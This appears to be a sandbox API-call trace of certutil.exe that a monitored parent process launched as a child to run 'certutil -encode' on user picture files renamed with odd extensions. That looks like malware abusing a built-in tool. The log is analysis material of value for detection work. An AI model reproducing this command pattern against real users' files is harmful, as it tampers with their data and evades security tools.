[0297.389] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0297.389] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0297.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x88dc47ecb8 | out: phkResult=0x88dc47ecb8*=0x23c) returned 0x0 [0297.390] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2692e99b280 [0297.390] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x88dc47f228, lpData=0x88dc47f258, lpcbData=0x88dc47f220*=0x4 | out: lpType=0x88dc47f228*=0x0, lpData=0x88dc47f258*=0x0, lpcbData=0x88dc47f220*=0x4) returned 0x2 [0297.390] LocalFree (hMem=0x2692e99b280) returned 0x0 [0297.390] RegCloseKey (hKey=0x23c) returned 0x0 [0297.390] LocalFree (hMem=0x0) returned 0x0 [0297.390] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2692e9bcc90 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0297.406] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0297.406] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0297.407] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0297.407] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2692e9c1cd0 [0297.407] GetComputerNameW (in: lpBuffer=0x2692e9c1cd0, nSize=0x88dc47f220 | out: lpBuffer="NQDPDE", nSize=0x88dc47f220) returned 1 [0297.407] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x88dc47f1f0 | out: lpBuffer=0x0, nSize=0x88dc47f1f0) returned 0 [0297.407] GetLastError () returned 0xea [0297.407] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2692e9abad0 [0297.407] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2692e9abad0, nSize=0x88dc47f1f0 | out: lpBuffer="NQdPdE", nSize=0x88dc47f1f0) returned 1 [0297.408] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0297.410] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2692e9c1dd0, cbCertEncoded=0x79a3) returned 0x0 [0297.412] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2692e9c1dd0, cbCrlEncoded=0x79a3) returned 0x0 [0297.413] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2692e9c1dd0, cbEncoded=0x79a3, dwFlags=0x8000, pDecodePara=0x88dc47f0d0, pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154 | out: pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154) returned 0 [0297.413] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2692e9c1dd0, cbEncoded=0x79a3, dwFlags=0x8000, pDecodePara=0x88dc47f0d0, pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154 | out: pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154) returned 0 [0297.413] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2692e9c1dd0, cbEncoded=0x79a3, dwFlags=0x8000, pDecodePara=0x88dc47f0d0, pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154 | out: pvStructInfo=0x88dc47f160, pcbStructInfo=0x88dc47f154) returned 0 [0297.413] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2692e9a5660 [0297.426] CryptMsgUpdate (hCryptMsg=0x2692e9a5660, pbData=0x2692e9c1dd0, cbData=0x79a3, fFinal=1) returned 0 [0297.426] GetLastError () returned 0x8009310b [0297.426] CryptMsgClose (hCryptMsg=0x2692e9a5660) returned 1 [0297.426] GetFileAttributesExW (in: lpFileName="E8sv92vO_xVbOO.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg.sister"), fInfoLevelId=0x0, lpFileInformation=0x88dc47f180 | out: lpFileInformation=0x88dc47f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3)) returned 1 [0297.426] _vsnwprintf (in: _Buffer=0x88dc47f188, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f178 | out: _Buffer="359") returned 3 [0297.426] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x88dc47ef40, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0297.426] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2692e9c1b50 [0297.426] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.426] _vsnwprintf (in: _Buffer=0x88dc47e170, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x88dc47f1c8 | out: _Buffer="Input Length = 31139") returned 20 [0297.426] GetFileType (hFile=0x50) returned 0x2 [0297.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e170*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x88dc47e124, lpReserved=0x0 | out: lpBuffer=0x88dc47e170*, lpNumberOfCharsWritten=0x88dc47e124*=0x14) returned 1 [0297.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.428] _vsnwprintf (in: _Buffer=0x88dc47e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0x88dc47f1c8 | out: _Buffer="\n") returned 1 [0297.428] GetFileType (hFile=0x50) returned 0x2 [0297.428] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x88dc47e124, lpReserved=0x0 | out: lpBuffer=0x88dc47e170*, lpNumberOfCharsWritten=0x88dc47e124*=0x1) returned 1 [0297.532] GetFileAttributesExW (in: lpFileName="E8sv92vO_xVbOO.jpg.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg.cruel"), fInfoLevelId=0x0, lpFileInformation=0x88dc47f180 | out: lpFileInformation=0x88dc47f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbed63d4, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdbed63d4, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdbf15cb2, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xa77a)) returned 1 [0297.532] _vsnwprintf (in: _Buffer=0x88dc47f188, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f178 | out: _Buffer="361") returned 3 [0297.532] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x88dc47ef40, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0297.532] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2692e9c1d30 [0297.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.532] _vsnwprintf (in: _Buffer=0x88dc47e170, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x88dc47f1c8 | out: _Buffer="Output Length = 42874") returned 21 [0297.532] GetFileType (hFile=0x50) returned 0x2 [0297.532] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e170*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x88dc47e124, lpReserved=0x0 | out: lpBuffer=0x88dc47e170*, lpNumberOfCharsWritten=0x88dc47e124*=0x15) returned 1 [0297.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.534] _vsnwprintf (in: _Buffer=0x88dc47e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0x88dc47f1c8 | out: _Buffer="\n") returned 1 [0297.534] GetFileType (hFile=0x50) returned 0x2 [0297.534] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x88dc47e124, lpReserved=0x0 | out: lpBuffer=0x88dc47e170*, lpNumberOfCharsWritten=0x88dc47e124*=0x1) returned 1 [0297.555] LocalFree (hMem=0x2692e9c1dd0) returned 0x0 [0297.555] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0297.555] _vsnwprintf (in: _Buffer=0x88dc47f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f1d8 | out: _Buffer="2022") returned 4 [0297.556] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x88dc47efa0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0297.556] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2692e998d40 [0297.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.556] _vsnwprintf (in: _Buffer=0x88dc47e1d0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x88dc47f228 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0297.556] GetFileType (hFile=0x50) returned 0x2 [0297.556] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e1d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x88dc47e184, lpReserved=0x0 | out: lpBuffer=0x88dc47e1d0*, lpNumberOfCharsWritten=0x88dc47e184*=0x31) returned 1 [0297.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.556] _vsnwprintf (in: _Buffer=0x88dc47e1d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x88dc47f228 | out: _Buffer="\n") returned 1 [0297.556] GetFileType (hFile=0x50) returned 0x2 [0297.557] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x88dc47e1d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x88dc47e184, lpReserved=0x0 | out: lpBuffer=0x88dc47e1d0*, lpNumberOfCharsWritten=0x88dc47e184*=0x1) returned 1 [0297.567] LocalFree (hMem=0x0) returned 0x0 [0297.567] LocalFree (hMem=0x2692e9995a0) returned 0x0 [0297.567] LocalFree (hMem=0x2692e994420) returned 0x0 [0297.567] SetLastError (dwErrCode=0x80070716) [0297.567] _vsnwprintf (in: _Buffer=0x88dc47f258, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f248 | out: _Buffer="511") returned 3 [0297.567] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x88dc47f010, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0297.568] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2692e9c1be0 [0297.568] PostQuitMessage (nExitCode=0) [0297.568] GetMessageW (in: lpMsg=0x88dc47f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x88dc47f850) returned 0 [0297.568] LocalFree (hMem=0x2692e9abad0) returned 0x0 [0297.568] LocalFree (hMem=0x2692e9c1cd0) returned 0x0 [0297.568] LocalFree (hMem=0x0) returned 0x0 [0297.568] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0297.569] GetLastError () returned 0x7e [0297.569] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0297.569] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0297.570] DllMain () returned 0x1 [0297.570] LocalFree (hMem=0x2692e9ab8f0) returned 0x0 [0297.570] LocalFree (hMem=0x2692e99c080) returned 0x0 [0297.570] LocalFree (hMem=0x2692e9c1b50) returned 0x0 [0297.570] LocalFree (hMem=0x2692e9c1d30) returned 0x0 [0297.570] LocalFree (hMem=0x2692e998d40) returned 0x0 [0297.570] LocalFree (hMem=0x2692e9c1be0) returned 0x0 [0297.570] LocalFree (hMem=0x2692e9a20f0) returned 0x0 [0297.570] LocalFree (hMem=0x2692e99c1d0) returned 0x0 [0297.570] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0297.570] GetLastError () returned 0x7e [0297.570] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0297.570] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0297.570] DllMain () returned 0x1 [0297.571] exit (_Code=0) Thread: id = 120 os_tid = 0xe24 Process: id = "47" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2acc4000" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0xe0c [0298.167] GetStartupInfoW (in: lpStartupInfo=0xb1e8c7f7b0 | out: lpStartupInfo=0xb1e8c7f7b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0298.169] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0298.169] __set_app_type (_Type=0x1) [0298.169] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0298.169] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0298.172] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0298.172] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0298.173] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0298.173] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0298.173] WerSetFlags () returned 0x0 [0298.173] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0298.173] __iob_func () returned 0x7ffcea2dea00 [0298.175] _fileno (_File=0x7ffcea2dea30) returned 1 [0298.175] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0298.175] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0298.176] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0298.176] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0298.176] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0298.177] GetConsoleOutputCP () returned 0x1b5 [0298.178] _vsnwprintf (in: _Buffer=0xb1e8c7f720, _BufferCount=0xb, _Format=".%d", _ArgList=0xb1e8c7f648 | out: _Buffer=".437") returned 4 [0298.178] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0298.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.178] GetFileType (hFile=0x50) returned 0x2 [0298.178] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0298.179] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0298.179] SetThreadUILanguage (LangId=0x0) returned 0x409 [0298.179] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0298.179] GetCommandLineW () returned="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"" [0298.179] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x21cfb9eb430 [0298.180] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21cfb9dc7b0 [0298.180] LocalFree (hMem=0x21cfb9eb430) returned 0x0 [0298.180] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21cfb9e43c0 [0298.180] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x21cfb9e4360 [0298.180] LocalFree (hMem=0x21cfb9e43c0) returned 0x0 [0298.180] LocalFree (hMem=0x21cfb9dc7b0) returned 0x0 [0298.180] LocalFree (hMem=0x0) returned 0x0 [0298.180] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.180] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.181] GetCommandLineW () returned="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"" [0298.181] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x21cfb9eb7f0 [0298.181] GetSystemTime (in: lpSystemTime=0xb1e8c7f410 | out: lpSystemTime=0xb1e8c7f410*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2d1)) [0298.181] SystemTimeToFileTime (in: lpSystemTime=0xb1e8c7f410, lpFileTime=0xb1e8c7f408 | out: lpFileTime=0xb1e8c7f408) returned 1 [0298.181] FileTimeToLocalFileTime (in: lpFileTime=0xb1e8c7f408, lpLocalFileTime=0xb1e8c7f3d0 | out: lpLocalFileTime=0xb1e8c7f3d0) returned 1 [0298.181] FileTimeToSystemTime (in: lpFileTime=0xb1e8c7f3d0, lpSystemTime=0xb1e8c7f140 | out: lpSystemTime=0xb1e8c7f140) returned 1 [0298.181] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xb1e8c7f140, lpFormat=0x0, lpDateStr=0xb1e8c7f250, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0298.181] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xb1e8c7f140, lpFormat=0x0, lpTimeStr=0xb1e8c7f150, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0298.181] _vsnwprintf (in: _Buffer=0xb1e8c7f15e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xb1e8c7f128 | out: _Buffer=" 12.721s") returned 8 [0298.181] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x21cfb9ee270 [0298.182] SetLastError (dwErrCode=0x80070716) [0298.182] _vsnwprintf (in: _Buffer=0xb1e8c7f1d8, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f1c8 | out: _Buffer="948") returned 3 [0298.182] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xb1e8c7ef90, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0298.182] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x21cfb9eb350 [0298.182] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x21cfb9dba80 [0298.182] LocalFree (hMem=0x21cfb9ee270) returned 0x0 [0298.182] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xb1e8c7f480 | out: lpSystemTimeAsFileTime=0xb1e8c7f480*(dwLowDateTime=0xdc56e4ab, dwHighDateTime=0x1d6141f)) [0298.182] GetLocalTime (in: lpSystemTime=0xb1e8c7f4b8 | out: lpSystemTime=0xb1e8c7f4b8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2d3)) [0298.182] SystemTimeToFileTime (in: lpSystemTime=0xb1e8c7f4b8, lpFileTime=0xb1e8c7f490 | out: lpFileTime=0xb1e8c7f490) returned 1 [0298.182] CompareFileTime (lpFileTime1=0xb1e8c7f490, lpFileTime2=0xb1e8c7f480) returned 1 [0298.182] _vsnwprintf (in: _Buffer=0xb1e8c7f4c8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xb1e8c7f458 | out: _Buffer="GMT + 2.00") returned 10 [0298.183] LocalFree (hMem=0x21cfb9eb7f0) returned 0x0 [0298.183] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0298.183] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0298.183] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0298.183] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0298.183] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0298.183] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xb1e8c7f4f8 | out: _Buffer="10.0.15063.447") returned 14 [0298.183] GetACP () returned 0x4e4 [0298.183] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.183] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21cfb9eb470 [0298.183] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21cfb9eb470, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.183] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21cfb9ee330 [0298.183] _vsnwprintf (in: _Buffer=0x21cfb9ee330, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb1e8c7f548 | out: _Buffer="10.0.15063.447 retail") returned 21 [0298.184] LocalFree (hMem=0x21cfb9eb470) returned 0x0 [0298.184] LocalFree (hMem=0x0) returned 0x0 [0298.184] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.184] GetACP () returned 0x4e4 [0298.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.184] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21cfb9eb5f0 [0298.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21cfb9eb5f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.184] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21cfb9ee270 [0298.184] _vsnwprintf (in: _Buffer=0x21cfb9ee270, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb1e8c7f548 | out: _Buffer="10.0.15063.447 retail721s") returned 21 [0298.184] LocalFree (hMem=0x21cfb9eb5f0) returned 0x0 [0298.184] LocalFree (hMem=0x0) returned 0x0 [0298.184] GetACP () returned 0x4e4 [0298.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.184] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21cfb9eb3d0 [0298.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21cfb9eb3d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.184] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21cfb9edf70 [0298.184] _vsnwprintf (in: _Buffer=0x21cfb9edf70, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xb1e8c7f578 | out: _Buffer="10.0.15063.447 retail") returned 21 [0298.184] LocalFree (hMem=0x21cfb9eb3d0) returned 0x0 [0298.185] LocalFree (hMem=0x21cfb9ee330) returned 0x0 [0298.185] LocalFree (hMem=0x21cfb9ee270) returned 0x0 [0298.185] LocalFree (hMem=0x21cfb9edf70) returned 0x0 [0298.185] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0298.185] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0298.185] GetStockObject (i=0) returned 0x900010 [0298.185] RegisterClassW (lpWndClass=0xb1e8c7f6a0) returned 0xc1a2 [0298.185] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2302c8 [0298.202] NtdllDefWindowProc_W () returned 0x0 [0298.202] NtdllDefWindowProc_W () returned 0x1 [0298.209] NtdllDefWindowProc_W () returned 0x0 [0298.223] UpdateWindow (hWnd=0x2302c8) returned 1 [0298.223] PostMessageW (hWnd=0x2302c8, Msg=0x400, wParam=0x0, lParam=0x21cfb9d217e) returned 1 [0298.223] GetMessageW (in: lpMsg=0xb1e8c7f6f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb1e8c7f6f0) returned 1 [0298.223] TranslateMessage (lpMsg=0xb1e8c7f6f0) returned 0 [0298.223] DispatchMessageW (lpMsg=0xb1e8c7f6f0) returned 0x0 [0298.223] NtdllDefWindowProc_W () returned 0x0 [0298.223] GetMessageW (in: lpMsg=0xb1e8c7f6f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb1e8c7f6f0) returned 1 [0298.223] TranslateMessage (lpMsg=0xb1e8c7f6f0) returned 0 